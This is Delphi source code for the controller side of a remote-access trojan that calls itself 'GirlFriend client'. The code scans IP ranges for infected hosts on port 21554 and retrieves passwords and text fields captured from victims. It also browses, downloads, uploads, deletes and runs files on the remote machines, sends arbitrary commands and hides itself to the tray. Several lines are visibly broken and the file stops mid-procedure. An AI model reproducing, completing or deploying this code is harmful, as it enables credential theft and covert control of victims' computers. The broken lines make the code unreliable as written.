资源名称 [点击查看]
- unit main;
- interface
- uses
- Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
- Menus, StdCtrls, Buttons, ScktComp, ExtCtrls, ComCtrls, About, ImgList,
- OleCtrls, ShellAPI;
- type
- TClientForm = class(TForm)
- stbStatus: TStatusBar;
- ClientSocket: TClientSocket;
- sbConnect: TSpeedButton;
- sbShowPass: TSpeedButton;
- sbAbout: TSpeedButton;
- sbCustom: TSpeedButton;
- sbExit: TSpeedButton;
- ilApp: TImageList;
- sbMessage: TSpeedButton;
- gbLog: TGroupBox;
- gbTree: TGroupBox;
- txtLog: TMemo;
- Label1: TLabel;
- Label2: TLabel;
- PortChange: TButton;
- sbReset: TSpeedButton;
- cmdSave: TButton;
- sd1: TSaveDialog;
- tvApp: TTreeView;
- pmActions: TPopupMenu;
- Showpasswords1: TMenuItem;
- Sendmessage1: TMenuItem;
- Resetpasswordlist1: TMenuItem;
- N3: TMenuItem;
- PingserverAlive1: TMenuItem;
- N2: TMenuItem;
- mnuPlaySound: TMenuItem;
- mnuShowPic: TMenuItem;
- N1: TMenuItem;
- mnuURL: TMenuItem;
- mnuDelim1: TMenuItem;
- mnuShow: TMenuItem;
- N4: TMenuItem;
- mnuConnect: TMenuItem;
- N5: TMenuItem;
- mnuQuit: TMenuItem;
- ilWin: TImageList;
- txtHid: TMemo;
- sbFileManager: TSpeedButton;
- pmFile: TPopupMenu;
- mnuDelete: TMenuItem;
- N6: TMenuItem;
- mnuDownload: TMenuItem;
- mnuDelim: TMenuItem;
- mnuRun: TMenuItem;
- N7: TMenuItem;
- mnuUpload: TMenuItem;
- od1: TOpenDialog;
- IP: TComboBox;
- portvalue: TComboBox;
- procedure ScanIPs;
- procedure ProcessDiskList;
- procedure ClientSocketConnect(Sender: TObject;
- Socket: TCustomWinSocket);
- procedure ClientSocketRead(Sender: TObject; Socket: TCustomWinSocket);
- procedure ClientSocketError(Sender: TObject; Socket: TCustomWinSocket;
- ErrorEvent: TErrorEvent; var ErrorCode: Integer);
- procedure ProcessTree;
- procedure ProcessDirectory;
- procedure FormClose(Sender: TObject; var Action: TCloseAction);
- procedure sbConnectClick(Sender: TObject);
- procedure sbShowPassClick(Sender: TObject);
- procedure sbCustomClick(Sender: TObject);
- procedure sbExitClick(Sender: TObject);
- procedure sbAboutClick(Sender: TObject);
- procedure FormCreate(Sender: TObject);
- procedure sbMessageClick(Sender: TObject);
- procedure txtLogDblClick(Sender: TObject);
- procedure PortChangeClick(Sender: TObject);
- procedure sbResetClick(Sender: TObject);
- procedure cmdSaveClick(Sender: TObject);
- procedure PingserverAlive1Click(Sender: TObject);
- procedure mnuPlaySoundClick(Sender: TObject);
- procedure mnuShowPicClick(Sender: TObject);
- procedure txtLogKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- procedure tvAppKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- procedure portvalue1KeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- procedure IP1KeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- procedure PortChangeKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- procedure cmdSaveKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- procedure FormKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- procedure NotifyIcon (var TM : TMessage); message WM_NOTIFYMSG;
- procedure mnuShowClick(Sender: TObject);
- procedure mnuURLClick(Sender: TObject);
- procedure tvAppExpanding(Sender: TObject; Node: TTreeNode;
- var AllowExpansion: Boolean);
- procedure tvAppCollapsing(Sender: TObject; Node: TTreeNode;
- var AllowCollapse: Boolean);
- procedure sbFileManagerClick(Sender: TObject);
- procedure tvAppDblClick(Sender: TObject);
- procedure tvAppMouseDown(Sender: TObject; Button: TMouseButton;
- Shift: TShiftState; X, Y: Integer);
- procedure pmFilePopup(Sender: TObject);
- procedure mnuDeleteClick(Sender: TObject);
- procedure mnuRunClick(Sender: TObject);
- procedure mnuDownloadClick(Sender: TObject);
- procedure mnuUploadClick(Sender: TObject);
- protected
- IsServer: Boolean;
- end;
- var
- ClientForm: TClientForm;
- Server: String;
- implementation
- uses MessageUnit;
- const
- WrapStr = #13+#10;
- LastPosition = 1000;
- type iptype = record
- ipcount, pcount:integer;
- ip:array[0..99] of string[25];
- port:array [0..99] of integer;
- end;
- var
- Fl: FILE of IPType;
- loading, scanning, working,
- diskmode, TreeCame, recfile,
- DeleteAnswer, FileDestroyed,
- Uploaded : boolean;
- Connection, ServerAnswer : boolean;
- PList : array [1..LastPosition] of string;
- PC: integer;
- CurrIP: string;
- IP_base, IP_count, CurrPort : integer;
- FolderNode : TTreeNode;
- FName, PCN : string;
- FSize, AC, SC : integer;
- FlT : FILE;
- buffer : array [0..16385] of byte;
- {$R *.DFM}
- function extract (st : string; ind1, ind2 : integer): string;
- var i: integer;
- begin
- result:='';
- for i:=ind1 to ind2 do
- result:=result+st[i];
- end;
- procedure AddTrayIcon (ID : integer; Hint : string; Icon : TIcon; hWnd : LongInt; CallBack : LongInt);
- var MC : TNotifyIconData;
- begin
- with MC do
- begin
- cbSize := sizeof(TNotifyIconData);
- Wnd := hWnd;
- uID := ID;
- uCallbackMessage := CallBack;
- hIcon := Icon.Handle;
- if (length(hint)>0) then
- StrLCopy(szTip, PChar(hint), 63)
- else
- szTip[0] := #0;
- end;
- if Shell_NotifyIcon (NIM_ADD, @MC) then
- SetWindowLong(Application.Handle, GWL_EXSTYLE,
- GetWindowLong(Application.Handle, GWL_EXSTYLE) or
- end;
- procedure ModifyTrayIcon (ID : integer; Hint : string; Icon : TIcon; hWnd : LongInt; CallBack : LongInt);
- var MC : TNotifyIconData;
- begin
- with MC do
- begin
- cbSize := sizeof(TNotifyIconData);
- Wnd := hWnd;
- uID := ID;
- uCallbackMessage := CallBack;
- hIcon := Icon.Handle;
- if (length(hint)>0) then
- StrLCopy(szTip, PChar(hint), 63)
- else
- szTip[0] := #0;
- end;
- Shell_NotifyIcon (NIM_MODIFY, @MC);
- end;
- procedure DestroyTrayIcon (ID : integer; hWnd : LongInt);
- var MC : TNotifyIconData;
- begin
- with MC do
- begin
- cbSize := sizeof(TNotifyIconData);
- Wnd := hWnd;
- uID := ID;
- end;
- Shell_NotifyIcon (NIM_DELETE, @MC);
- end;
- // Cuts the string at '(' position (when clicking filenames)
- function TrimPRT (ST : string): string;
- var i : integer;
- begin
- result:='';
- for i:=1 to Length(ST)-1 do
- if ST[i+1]='(' then break else result:=result+ST[i];
- end;
- // Duplicates the & symbol - to prevent _
- function DupAmps (var ST : string) : string;
- var i : integer;
- begin
- result:='';
- for i:=1 to Length(ST) do
- if ST[i]<>'&' then result:=result+ST[i]
- else result:=result+'&&';
- end;
- procedure TClientForm.ScanIPs;
- var i, DotPos : integer;
- ST, IPT : string;
- begin
- ST:=IP.Text;
- for i:=Length (ST) downto 1 do
- if ST[i]='.' then break;
- DotPos:=i;
- IP_base:=strtoint (extract (ST, i+1, Pos ('+', ST)-1));
- IP_count:=strtoint (extract (ST, Pos ('+', ST)+1, Length (ST)));
- IPT:=copy (ST, 1, DotPos);
- scanning:=true;
- for i:=0 to IP_count do
- begin
- CurrIP:=IPT+inttostr (IP_base+i);
- ClientSocket.Close;
- ClientSocket.Port:=CurrPort;
- ClientSocket.Address:=CurrIP;
- stbStatus.Panels[0].Text := 'Scanning IP '+CurrIP;
- ClientSocket.Open;
- ServerAnswer:=false;
- repeat
- Application.ProcessMessages;
- until ServerAnswer;
- if Connection then break;
- end;
- end;
- procedure TClientForm.sbConnectClick(Sender: TObject);
- begin
- if sbConnect.caption='Disconnect' then
- begin
- ilWin.GetIcon (0, ClientForm.Icon);
- ModifyTrayIcon (1, 'GirlFriend client v1.2',
- ClientForm.Icon, ClientForm.Handle,
- sbConnect.caption:='Connect';
- mnuConnect.Caption:='Connect';
- sbShowPass.Enabled:=false;
- sbMessage.Enabled:=false;
- sbCustom.Enabled:=false;
- sbFileManager.Enabled:=false;
- ClientForm.Showpasswords1.Enabled:=false;
- ClientForm.Sendmessage1.Enabled:=false;
- ClientForm.Resetpasswordlist1.Enabled:=false;
- ClientForm.PingserverAlive1.Enabled:=false;
- ClientForm.mnuPlaySound.Enabled:=false;
- ClientForm.mnuShowPic.Enabled:=false;
- ClientForm.mnuURL.Enabled:=false;
- sbReset.Enabled:=false;
- PortChange.Enabled:=false;
- clientsocket.socket.SendText('Quiting..');
- clientsocket.Close;
- stbStatus.Panels[0].Text := 'Disconnected';
- exit;
- end;
- if (Length(IP.Text)>0) then
- begin
- if portvalue.text>'' then ClientSocket.Port:=strtoint(portvalue.Text) else
- begin
- ClientSocket.Port:=21554;
- PortValue.Text:=inttostr (ClientSocket.Port);
- end;
- CurrPort:=ClientSocket.Port;
- if Pos('+', IP.Text)=0 then
- begin
- scanning:=false;
- CurrIP:=IP.Text;
- with ClientSocket do
- begin
- Address := IP.Text;
- Open;
- end
- end
- else
- ScanIPs;
- end;
- end;
- procedure TClientForm.ClientSocketConnect(Sender: TObject;
- Socket: TCustomWinSocket);
- var
- i:integer;
- a, b:boolean;
- begin
- a:=false;
- b:=false;
- for i:=0 to ip.items.count+1 do if ip.Items[i]=clientsocket.address then a:=true;
- for i:=0 to portvalue.items.count+1 do if portvalue.Items[i]=inttostr(clientsocket.port) then b:=true;
- if a<>true then ip.items.Add(clientsocket.address);
- if b<>true then portvalue.items.Add(inttostr(clientsocket.port));
- ServerAnswer:=true;
- Connection:=true;
- ilWin.GetIcon (1, ClientForm.Icon);
- ModifyTrayIcon (1, 'GirlFriend client v1.2. Connected with '+Socket.RemoteAddress,
- ClientForm.Icon, ClientForm.Handle,
- PortChange.Enabled:=true;
- sbConnect.caption:='Disconnect';
- mnuConnect.Caption:='Disconnect';
- stbStatus.Panels[0].Text := 'Connected to: ' + Socket.RemoteAddress;
- clientsocket.socket.SendText ('ver');
- ClientSocket.Socket.SendText ('time');
- tvApp.Items.Clear;
- sbShowPass.Enabled:=true;
- sbMessage.Enabled:=true;
- sbCustom.Enabled:=true;
- sbReset.Enabled:=true;
- sbFileManager.Enabled:=true;
- ClientForm.Showpasswords1.Enabled:=true;
- ClientForm.Sendmessage1.Enabled:=true;
- ClientForm.Resetpasswordlist1.Enabled:=true;
- ClientForm.PingserverAlive1.Enabled:=true;
- ClientForm.mnuPlaySound.Enabled:=true;
- ClientForm.mnuShowPic.Enabled:=true;
- ClientForm.mnuURL.Enabled:=true;
- end;
- procedure TClientForm.ProcessTree;
- var i: integer;
- First, TMP, found : TTreeNode;
- ST, FT : string;
- function FindNode (caption : string): boolean;
- var c : integer;
- begin
- result:=false;
- for c:=0 to tvApp.Items.Count-1 do
- if tvApp.Items.Item[c].Text=caption then
- begin
- result:=true;
- found:=tvApp.Items.Item[c];
- break;
- end;
- end;
- begin
- tvApp.Items.Clear;
- First:=tvApp.Items.GetFirstNode;
- for i:=1 to PC do
- begin
- ST:=extract (PList[i], 1, Pos ('___', PList[i])-1);
- if not(FindNode(ST)) then
- begin
- TMP:=tvApp.Items.Add (First, ST);
- TMP.ImageIndex:=0;
- TMP.SelectedIndex:=0;
- end;
- end;
- for i:=1 to PC do
- begin
- ST:=extract (PList[i], 1, Pos ('___', PList[i])-1);
- FT:=extract (PList[i], Pos ('___', PList[i])+3, Length(PList[i]));
- if FindNode(ST) then
- begin
- TMP:=tvApp.Items.AddChild (found, FT);
- TMP.ImageIndex:=1;
- TMP.SelectedIndex:=1;
- end;
- end;
- end;
- procedure TClientForm.ProcessDiskList;
- var TMP, First : TTreeNode;
- i : integer;
- ST : string;
- begin
- tvApp.Items.Clear;
- First:=tvApp.Items.GetFirstNode;
- for i:=1 to PC do
- begin
- ST:=extract (PList[i], 3, Length(PList[i])-1);
- TMP:=tvApp.Items.Add (First, ST);
- case PList[i][1] of
- 'H' : begin
- TMP.ImageIndex:=HDD_ICON;
- TMP.SelectedIndex:=HDD_ICON;
- end;
- 'C' : begin
- TMP.ImageIndex:=CDROM_ICON;
- TMP.SelectedIndex:=CDROM_ICON;
- end;
- end;
- TMP:=tvApp.Items.AddChild (TMP, 'Loading...');
- TMP.SelectedIndex:=-1;
- TMP.ImageIndex:=-1;
- end;
- end;
- procedure TClientForm.ProcessDirectory;
- var i : integer;
- ST : string;
- CP : char;
- TMP : TTreeNode;
- procedure SetIcon (ic : integer);
- begin
- TMP.ImageIndex:=ic;
- TMP.SelectedIndex:=ic;
- end;
- begin
- working:=true;
- diskmode:=false;
- FolderNode.DeleteChildren;
- for i:=1 to PC do
- begin
- ST:=extract (PList[i], 3, Length(PList[i]));
- CP:=PList[i][1];
- TMP:=tvApp.Items.AddChild (FolderNode, ST);
- case CP of
- 'E': SetIcon (EXE_FILE);
- 'W': SetIcon (WAV_FILE);
- 'B': SetIcon (BMP_FILE);
- 'U': SetIcon (USUAL_FILE);
- 'F': begin
- SetIcon (CLOSED_ICON);
- TMP:=tvApp.Items.AddChild (TMP, 'Loading...');
- SetIcon (-1);
- end;
- end;
- end;
- FolderNode.Expand (FALSE);
- diskmode:=true;
- TreeCame:=true;
- working:=false;
- end;
- procedure TClientForm.ClientSocketRead(Sender: TObject;
- Socket: TCustomWinSocket);
- var RST : string;
- i : integer;
- begin
- if (recfile) then
- begin
- repeat
- Application.ProcessMessages;
- AC:=Socket.ReceiveBuf (buffer, 1024);
- if AC>0 then
- begin
- SC:=SC+AC;
- Str (round(100*SC/FSize):3, PCN);
- stbStatus.Panels[0].Text:='Receiving '+FName+'. '+PCN+'% done.';
- stbStatus.Refresh;
- BlockWrite (FlT, buffer, AC);
- end;
- until SC>=FSize;
- if recfile then
- begin
- CloseFile (FlT);
- txtLog.Lines.Add ('Downloading complete.');
- stbStatus.Panels[0].Text:='Waiting for command.';
- end;
- working:=false;
- recfile:=false;
- exit;
- end;
- if not(working) then
- begin
- RST:=Socket.ReceiveText;
- if RST='Uploading complete.' then
- begin
- Uploaded:=true;
- ServerAnswer:=True;
- end
- else
- ServerAnswer:=True;
- if Pos ('FCOMP}', RST)<>0 then
- begin
- working:=true;
- loading:=false;
- // Compress the txtHid
- for i:=0 to txtHid.Lines.Count-1 do
- if txtHid.Lines.Strings[i]='' then txtHid.Lines.Delete(i);
- FSize:=strtoint(txtHid.Lines.Strings[0]);
- FName:=txtHid.Lines.Strings[1];
- AssignFile (FlT, FName);
- ReWrite (FlT, 1);
- for i:=0 to Length(RST)-9 do
- buffer[i]:=ord(RST[i+7]);
- BlockWrite (FlT, buffer, Length(RST)-9, SC);
- recfile:=true;
- exit;
- end;
- if loading then txtHid.Text:=txtHid.Text+RST;
- if (pos('{PLTS}',RST)>0) then
- begin
- txtHid.Lines.Clear;
- txtHid.text:=copy(RST,7,length(rst)-6);
- loading:=true;
- end;
- if (pos('{TDSS}',RST)>0) then
- begin
- txtHid.Lines.Clear;
- txtHid.text:=copy(RST,7,length(rst)-6);
- loading:=true;
- end;
- if (pos('{FSEND}', RST)>0) then
- begin
- txtHid.Lines.Clear;
- txtHid.text:=copy(RST,8,length(rst)-7);
- loading:=true;
- end;
- if (pos('{LFTM}',RST)>0) then
- begin
- txtHid.Lines.Clear;
- txtHid.text:=copy(RST,7,length(rst)-6);
- loading:=true;
- end;
- if (not(loading)) then
- begin
- if RST='File deleted.' then
- begin
- FileDestroyed:=true;
- DeleteAnswer:=true;
- end;
- if RST='Delete Error.' then
- begin
- FileDestroyed:=false;
- DeleteAnswer:=true;
- end;
- txtLog.Lines.Add (RST);
- exit;
- end;
- if pos('TPL}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then
- begin
- loading:=false;
- PC:=0;
- for i:=0 to txtHid.Lines.Count-1 do
- if (txtHid.Lines.Strings [i]<>'') and (txtHid.Lines.Strings[i]<>'{FTPL}')
- and (Pos ('___', txtHid.Lines.Strings[i])<>0) then
- begin
- Inc (PC);
- PList [PC]:=txtHid.Lines.Strings[i];
- end;
- gbTree.Caption:=' Password && text fields ';
- ProcessTree;
- diskmode:=false;
- exit;
- end;
- if pos('FDT}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then
- begin
- loading:=false;
- PC:=0;
- for i:=0 to txtHid.Lines.Count-1 do
- if (txtHid.Lines.Strings[i]<>'') and
- (txtHid.Lines.Strings[i]<>'{FFDT}') then
- begin
- Inc (PC);
- PList[PC]:=txtHid.Lines.Strings[i];
- end;
- gbTree.Caption:=' File Manager ';
- ProcessDiskList;
- diskmode:=true;
- exit;
- end;
- if pos('ETL}',txtHid.Lines.Strings [txtHid.Lines.Count-1])>0 then
- begin
- loading:=false;
- PC:=0;
- for i:=0 to txtHid.Lines.Count-1 do
- if (txtHid.Lines.Strings[i]<>'') and
- (Length(txtHid.Lines.Strings[i])>8) then
- begin
- Inc (PC);
- PList[PC]:=txtHid.Lines.Strings[i];
- if (PC+1)>LastPosition then break;
- end;
- ProcessDirectory;
- exit;
- end;
- end;
- end;
- procedure TClientForm.ClientSocketError(Sender: TObject;
- Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
- var ErrorCode: Integer);
- begin
- if not(scanning) then
- stbStatus.Panels[0].Text := 'Error connecting to : ' + CurrIP
- else
- begin
- ServerAnswer:=true;
- Connection:=false;
- end;
- ErrorCode := 0;
- end;
- procedure TClientForm.FormClose(Sender: TObject; var Action: TCloseAction);
- var ipdata:iptype;
- i:integer;
- begin
- AssignFile (fl, 'hosts.ip');
- if fileexists ('hosts.ip') then reset (fl)
- else rewrite (fl);
- seek(fl,0);
- for i:=0 to ip.items.Count-1 do ipdata.ip[i]:=ip.items[i];
- for i:=0 to portvalue.items.Count-1 do ipdata.port[i]:=strtoint(portvalue.items[i]);
- ipdata.pcount:=portvalue.items.count;
- ipdata.ipcount:=ip.items.count;
- write(fl,ipdata);
- closefile(fl);
- if clientsocket.Active then begin
- clientSocket.Socket.SendText('Quiting..');
- clientsocket.close;
- end;
- end;
- procedure TClientForm.sbShowPassClick(Sender: TObject);
- begin
- if (ClientSocket.Active) and (not(loading)) then clientsocket.socket.SendText ('Old me show?');
- end;
- procedure TClientForm.sbCustomClick(Sender: TObject);
- var strtos:string;
- begin
- if inputquery ('Custom', 'Enter command: ', strtos) then clientsocket.socket.SendText (strtos);
- end;
- procedure TClientForm.sbExitClick(Sender: TObject);
- begin
- DestroyTrayIcon (1, ClientForm.Handle);
- clientsocket.Socket.SendText ('Quiting..');
- if clientsocket.Active then clientsocket.close;
- halt(0);
- end;
- procedure TClientForm.sbAboutClick(Sender: TObject);
- begin
- AboutForm.ShowModal;
- end;
- procedure TClientForm.FormCreate(Sender: TObject);
- var ipdata:iptype;
- i:integer;
- begin
- if fileexists ('hosts.ip') then
- begin
- AssignFile (fl, 'hosts.ip');
- ReSet (fl);
- Read(fl, ipdata);
- for i:=0 to ipdata.ipcount-1 do ip.items.Add (ipdata.ip[i]);
- for i:=0 to ipdata.pcount-1 do portvalue.items.add (inttostr(ipdata.port[i]));
- clientsocket.address:=ipdata.ip[ipdata.ipcount-1];
- clientsocket.port:=ipdata.port[ipdata.pcount-1];
- ip.text:=ipdata.ip[ipdata.ipcount-1];
- portvalue.Text:=inttostr(ipdata.port[ipdata.pcount-1]);
- closefile (fl);
- end;
- diskmode:=false;
- working:=false;
- loading:=false;
- end;
- procedure TClientForm.sbMessageClick(Sender: TObject);
- begin
- frmMessage.ShowModal;
- end;
- procedure TClientForm.txtLogDblClick(Sender: TObject);
- begin
- txtlog.Lines.clear;
- end;
- procedure TClientForm.PortChangeClick(Sender: TObject);
- begin
- if portvalue.text<>'' then
- begin
- ClientSocket.Socket.SendText ('setport'+portvalue.Text);
- ClientSocket.close;
- Clientsocket.port:=strtoint(portvalue.text);
- end;
- end;
- procedure TClientForm.sbResetClick(Sender: TObject);
- begin
- if ( and (not(loading)) then clientsocket.socket.SendText ('RESETALL');
- end;
- procedure TClientForm.cmdSaveClick(Sender: TObject);
- var i : integer;
- Fl: TextFILE;
- FS : string;
- function RPSP (tms : integer) : string;
- var i : integer;
- begin
- result:='';
- if tms>0 then
- for i:=1 to tms do
- result:=result+' ';
- end;
- begin
- if sd1.Execute then
- begin
- AssignFile (Fl, sd1.FileName);
- ReWrite (Fl);
- for i:=0 to tvApp.Items.Count-1 do
- begin
- FS:='['+inttostr(i+1)+']'+
- RPSP(tvApp.Items[i].Level)+
- tvApp.Items[i].Text;
- WriteLn (Fl, FS);
- end;
- CloseFile (Fl);
- end;
- end;
- procedure TClientForm.PingserverAlive1Click(Sender: TObject);
- begin
- if not(loading) then clientsocket.socket.SendText ('TEST?');
- end;
- procedure TClientForm.mnuPlaySoundClick(Sender: TObject);
- var strtos: string;
- begin
- strtos:='';
- if not(loading) then if inputquery ('Play sound', 'Enter full && exact path to .wav file: ', strtos) then clientsocket.socket.SendText ('{S}'+strtos);
- end;
- procedure TClientForm.mnuShowPicClick(Sender: TObject);
- var strtos: string;
- begin
- strtos:='';
- if not(loading) then if inputquery ('Show bitmap', 'Enter full && exact path to .bmp file: ', strtos) then clientsocket.socket.SendText ('{P}'+strtos);
- end;
- procedure AnswerF12 (KC : Word);
- var TMS : string;
- begin
- if KC=VK_F12 then
- begin
- ClientForm.mnuShow.Visible:=true;
- ClientForm.mnuShow.Default:=true;
- ClientForm.mnuDelim1.Visible:=true;
- TMS:='BoyFriend (client) version: 1.35';
- if ClientForm.ClientSocket.Socket.Connected then
- TMS:=TMS+'. Connected with '+ClientForm.ClientSocket.Address;
- AddTrayIcon (1, TMS,
- ClientForm.Icon, ClientForm.Handle,
- ClientForm.Hide;
- end;
- end;
- procedure TClientForm.NotifyIcon (var TM : TMessage);
- var AC : LongInt;
- CP : TPoint;
- begin
- AC:=TM.LParam;
- begin
- ClientForm.mnuShow.Visible:=false;
- ClientForm.mnuShow.Default:=false;
- ClientForm.mnuDelim1.Visible:=false;
- ClientForm.Show;
- DestroyTrayIcon (1, ClientForm.Handle);
- end;
- begin
- GetCursorPos (CP);
- pmActions.Popup (CP.X, CP.Y);
- end;
- end;
- procedure TClientForm.txtLogKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- begin
- AnswerF12 (Key);
- end;
- procedure TClientForm.tvAppKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- begin
- AnswerF12 (Key);
- end;
- procedure TClientForm.portvalue1KeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- begin
- AnswerF12 (Key);
- end;
- procedure TClientForm.IP1KeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- begin
- AnswerF12 (Key);
- end;
- procedure TClientForm.PortChangeKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- begin
- AnswerF12 (Key);
- end;
- procedure TClientForm.cmdSaveKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- begin
- AnswerF12 (Key);
- end;
- procedure TClientForm.FormKeyDown(Sender: TObject; var Key: Word;
- Shift: TShiftState);
- begin
- AnswerF12 (Key);
- end;
- procedure TClientForm.mnuShowClick(Sender: TObject);
- begin
- ClientForm.mnuShow.Visible:=false;
- ClientForm.mnuShow.Default:=false;
- ClientForm.mnuDelim1.Visible:=false;
- ClientForm.Show;
- DestroyTrayIcon (1, ClientForm.Handle);
- end;
- procedure TClientForm.mnuURLClick(Sender: TObject);
- var strtos : string;
- begin
- strtos:='';
- if not(loading) then
- if inputquery ('Go to URL', 'Enter URL (with http://). ', strtos) then clientsocket.socket.SendText ('{U}'+strtos);
- end;
- procedure TClientForm.tvAppExpanding(Sender: TObject; Node: TTreeNode;
- var AllowExpansion: Boolean);
- begin
- AllowExpansion:=(Node.getFirstChild.ImageIndex<>-1);
- if not(AllowExpansion) then
- begin
- tvApp.Selected:=Node;
- tvAppDblClick (Sender);
- end
- else
- if Node.ImageIndex=CLOSED_ICON then
- begin
- Node.ImageIndex:=OPEN_ICON;
- Node.SelectedIndex:=OPEN_ICON;
- end;
- end;
- procedure TClientForm.tvAppCollapsing(Sender: TObject; Node: TTreeNode;
- var AllowCollapse: Boolean);
- begin
- if Node.ImageIndex=OPEN_ICON then
- begin
- Node.ImageIndex:=CLOSED_ICON;
- Node.SelectedIndex:=CLOSED_ICON;
- end;
- end;
- procedure TClientForm.sbFileManagerClick(Sender: TObject);
- begin
- if (ClientSocket.Active) and (not(loading)) then clientsocket.socket.SendText ('getbaselist');
- end;
- procedure TClientForm.tvAppDblClick(Sender: TObject);
- var Start : TTreeNode;
- Path : string;
- begin
- if (diskmode) then
- begin
- if (tvApp.Selected.Data=nil) and
- (tvApp.Selected.ImageIndex in
- CDROM_ICON]) then
- begin
- FolderNode:=tvApp.Selected;
- Start:=tvApp.Selected;
- tvApp.Selected.Data:=@loading;
- Path:=Start.Text+'';
- if Start.Level>0 then
- repeat
- Start:=Start.Parent;
- Path:=Start.Text+''+Path;
- until Start.Level=0;
- if ClientSocket.Active then
- ClientSocket.Socket.SendText ('diskget'+Path);
- end;
- if (tvApp.Selected.ImageIndex in
- begin
- Start:=tvApp.Selected;
- Path:=TrimPRT (Start.Text);
- if Start.Level>0 then
- repeat
- Start:=Start.Parent;
- Path:=Start.Text+''+Path;
- until Start.Level=0;
- case tvApp.Selected.ImageIndex of
- BMP_FILE : Path:='{P}'+Path;
- WAV_FILE : Path:='{S}'+Path;
- EXE_FILE : Path:='{U}'+Path;
- end;
- if not(loading) then clientsocket.socket.SendText (Path);
- end;
- end;
- end;
- procedure TClientForm.tvAppMouseDown(Sender: TObject; Button: TMouseButton;
- Shift: TShiftState; X, Y: Integer);
- var CP : TPoint;
- begin
- if (Button=mbRight) and (diskmode) then
- begin
- GetCursorPos (CP);
- pmFile.Popup (CP.X, CP.Y);
- end;
- end;
- procedure TClientForm.pmFilePopup(Sender: TObject);
- begin
- mnuDownload.Enabled:=(tvApp.Selected.ImageIndex in
- mnuDelete.Enabled:=mnuDownload.Enabled;
- mnuDelim.Visible:=false;
- mnuRun.Visible:=false;
- if (tvApp.Selected.ImageIndex in
- begin
- mnuDelim.Visible:=true;
- mnuRun.Visible:=true;
- mnuRun.Default:=true;
- mnuRun.ImageIndex:=tvApp.Selected.ImageIndex;
- case tvApp.Selected.ImageIndex of
- BMP_FILE : mnuRun.Caption:='Show';
- WAV_FILE : mnuRun.Caption:='Play';
- EXE_FILE : mnuRun.Caption:='Run';
- end;
- end;
- mnuDelete.Enabled:=not (tvApp.Selected.ImageIndex in [HDD_ICON, CDROM_ICON]);
- end;
- procedure TClientForm.mnuDeleteClick(Sender: TObject);
- var Start, TrueChild : TTreeNode;
- Path : string;
- begin
- Start:=tvApp.Selected;
- TrueChild:=tvApp.Selected;
- Path:=TrimPRT (Start.Text);
- if Start.Level>0 then
- repeat
- Start:=Start.Parent;
- Path:=Start.Text+''+Path;
- until Start.Level=0;
- if MessageDlg ('Really delete '+DupAmps(Path)+' ?', mtConfirmation, [mbYes, mbNo], 0)=
- mrYes then
- if ClientSocket.Active then
- ClientSocket.Socket.SendText ('delfile'+Path);
- DeleteAnswer:=false;
- FileDestroyed:=false;
- repeat
- Application.ProcessMessages;
- until DeleteAnswer;
- if FileDestroyed then
- TrueChild.Delete;
- end;
- procedure TClientForm.mnuRunClick(Sender: TObject);
- begin
- tvAppDblClick (Sender);
- end;
- procedure TClientForm.mnuDownloadClick(Sender: TObject);
- var Start : TTreeNode;
- Path : string;
- begin
- Start:=tvApp.Selected;
- Path:=TrimPRT (Start.Text);
- if Start.Level>0 then
- repeat
- Start:=Start.Parent;
- Path:=Start.Text+''+Path;
- until Start.Level=0;
- if MessageDlg ('Download '+DupAmps(Path)+' ?', mtConfirmation, [mbYes, mbNo], 0)=
- mrYes then
- if ClientSocket.Active then
- ClientSocket.Socket.SendText ('getfile'+Path);
- end;
- procedure TClientForm.mnuUploadClick(Sender: TObject);
- var Fl : FILE;
- Query : string;
- i, BSent : integer;
- Folder : TTreeNode;
- RemotePath : string;
- begin
- if od1.Execute then
- begin
- Folder:=tvApp.Selected;
- if Folder.ImageIndex in
- Folder:=Folder.Parent;
- FolderNode:=Folder;
- RemotePath:=Folder.Text+'';
- if Folder.Level>0 then
- repeat
- Folder:=Folder.Parent;
- RemotePath:=Folder.Text+''+RemotePath;
- until Folder.Level=0;
- FName:=od1.FileName;
- AssignFile (Fl, FName);
- {$I-}
- ReSet (Fl, 1);
- {$I+}
- if IOResult<>0 then
- begin
- MessageDlg ('Error accessing file.', mtError, [mbOK], 0);
- exit;
- end;
- FSize:=FileSize(Fl);
- Query:='';
- for i:=Length(FName) downto 1 do
- if FName[i]='' then break else Query:=FName[i]+Query;
- Query:=Query+':::'+inttostr(FSize);
- if ClientSocket.Active then
- begin
- ClientSocket.Socket.SendText ('takefile'+RemotePath+Query+WrapStr);
- Sleep (1000); // !!!!DON'T REMOVE THIS COMMENT!!!! - 黩